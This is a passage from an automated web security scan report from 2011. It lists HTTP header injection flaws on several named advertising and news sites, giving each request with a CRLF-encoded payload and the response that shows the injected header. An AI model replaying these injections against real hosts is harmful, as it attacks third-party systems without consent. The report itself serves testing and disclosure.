Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:07 GMT;path=/;httponly


5.4. http://ads.mlive.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.mlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 4239b%0d%0a9a751c9a568 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=4239b%0d%0a9a751c9a568&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:03:08 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=4239b
9a751c9a568
; expires=Tue, 04-Oct-11 04:03:08 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:13:08 GMT;path=/;httponly


5.5. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e8c13%0d%0ab3daaf667e6 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=e8c13%0d%0ab3daaf667e6&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:49 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e8c13
b3daaf667e6
=1; expires=Tue, 04-Oct-11 04:00:49 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:10:49 GMT;path=/;httponly


5.6. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload defe0%0d%0a53610917434 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=defe0%0d%0a53610917434&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:14 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=defe0
53610917434
; expires=Tue, 04-Oct-11 04:02:14 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:14 GMT;path=/;httponly


5.7. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 8aac2%0d%0a98846847a98 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=8aac2%0d%0a98846847a98&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:8aac2
98846847a98
;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=42:60:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=169
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:06 GMT
Content-Length: 5179
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',8aac2
9
...[SNIP]...

5.8. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload aa378%0d%0ada9d31b7676 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=aa378%0d%0ada9d31b7676&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378
da9d31b7676
,cb964';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=144
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:14 GMT
Content-Length: 4571
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='aa378
d
...[SNIP]...

5.9. http://d7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 230a8%0d%0a11aff24a572 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=230a8%0d%0a11aff24a572&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 230a8
11aff24a572
;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4098
Date: Sun, 04 Sep 2011 02:31:53 GMT
Connection: close



5.10. http://dp.33across.com/ps/ [33x_ps cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /ps/

Issue detail

The value of the 33x_ps cookie is copied into the Location response header. The payload 1c931%0d%0ad466519e7bc was submitted in the 33x_ps cookie. This caused a response containing an injected HTTP header.

Request

GET /ps/?pid=533 HTTP/1.1
Host: dp.33across.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C1c931%0d%0ad466519e7bc

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 02:42:53 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C1c931%0D%0Ad466519e7bc; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:42:53 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=9035684957&seg_code=33x,6940,1c931
d466519e7bc
&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26adv%3D307445%26code%3D6940%26code%3D1c931%0D%0Ad466519e7bc&random=520952
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.11. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload 302dc%0d%0a2c2c5bc8c57 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=302dc%0d%0a2c2c5bc8c57 HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaV0%3D; DotomiRR2304=-1$4$1$-1$1$1$; rt_12783=2

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:25:04 GMT
X-Name: dmc-s01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Fri, 02-Sep-2016 11:25:04 GMT; Path=/
Location: http://login.dotomi.com/ucm/302dc
2c2c5bc8c57


Content-Type: text/html
Content-Length: 0


5.12. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of REST URL parameter 2 is copied into the OAS_DE_ERROR response header. The payload e17c4%0d%0a7333c9dabee was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/e17c4%0d%0a7333c9dabee HTTP/1.1
Host: oas.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 04:16:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oas.guardian.co.uk' for '/adstream.cap/e17c4
7333c9dabee
', referer '', handler 'cap-add'
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<
...[SNIP]...

5.13. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload f3bcd%0d%0a01cbdde2839 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=f3bcd%0d%0a01cbdde2839&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: f3bcd
01cbdde2839
=1; expires=Tue, 04-Oct-11 04:00:19 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5.14. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [dv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload e3c48%0d%0ae00512b83fa was submitted in the dv parameter. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=crtGdnUS&dv=e3c48%0d%0ae00512b83fa&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 04:01:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'e3c48
e00512b83fa
' value to numeric value [i]. request to 'oas.guardian.co.uk' for '/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e', referer 'http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c', handler 'cap-add'
Content-Length: 618
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

5.15. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload c5a46%0d%0a6fed33b49d9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/c5a46%0d%0a6fed33b49d9 HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 04:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oasc12.247realmedia.com' for '/RealMedia/ads/adstream.cap/c5a46
6fed33b49d9
', referer '', handler 'cap-add'
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<
...[SNIP]...

5.16. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload f35db%0d%0a0df7bbf4cf1 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=f35db%0d%0a0df7bbf4cf1&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:59:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: f35db
0df7bbf4cf1
=1; expires=Tue, 04-Oct-11 03:59:44 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5.17. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 9024a%0d%0a74cf762925 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=martinicrt&va=9024a%0d%0a74cf762925&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: martinicrt=9024a
74cf762925
; expires=Tue, 04-Oct-11 04:00:17 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5.18. http://optout.crwdcntrl.net/optout [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 859c1%0d%0a18e4734e5e9 was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=859c1%0d%0a18e4734e5e9 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:24:22 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:38:29 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=859c1
18e4734e5e9
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.19. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 38b21%0d%0a9f976ce8cc0 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=38b21%0d%0a9f976ce8cc0 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:13 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:20 GMT
Location: http://optout.crwdcntrl.net/optout?d=38b21
9f976ce8cc0
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.20. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5c587%0d%0aa6834fe02bc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&5c587%0d%0aa6834fe02bc=1 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
